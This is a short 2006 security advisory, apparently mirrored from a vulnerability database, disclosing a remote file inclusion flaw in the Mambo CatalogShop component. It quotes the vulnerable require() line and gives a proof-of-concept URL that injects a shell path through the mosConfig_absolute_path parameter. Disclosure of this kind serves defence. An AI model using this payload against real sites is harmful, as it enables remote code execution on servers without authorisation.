Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13962
HistoryAug 21, 2006 - 12:00 a.m.

Mambo CatalogShop Remote File Inclusion

2006-08-2100:00:00
vulners.com
22
            ###########################################################################################
            #                       Aria-Security.net Advisory                                        #
            #                       Discovered  by: O.U.T.L.A.W                                       #                     #                       < www.Aria-security.net >                                         #
            #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                              #
            #                                                                                         #
            ###########################################################################################

#Software: Mambo CatalogShop
#Attack method: Remote File Inclusion
#Descriptio : This is a modified version of the FacileForms mambot, which allows you to add and view user comments and ratings below content in the categories setup in xtdratings. Just publish it!
#Source:

Variables - Don't change anything here!!!

require($mosConfig_absolute_path."/administrator/components/com_catalogshop/config.catalogshop.php");


#Proof of Concept:
#http://www.site.com/catalogshop.php?mosConfig_absolute_path=shell

#----------------------------------------------------------

#Contact : [email protected]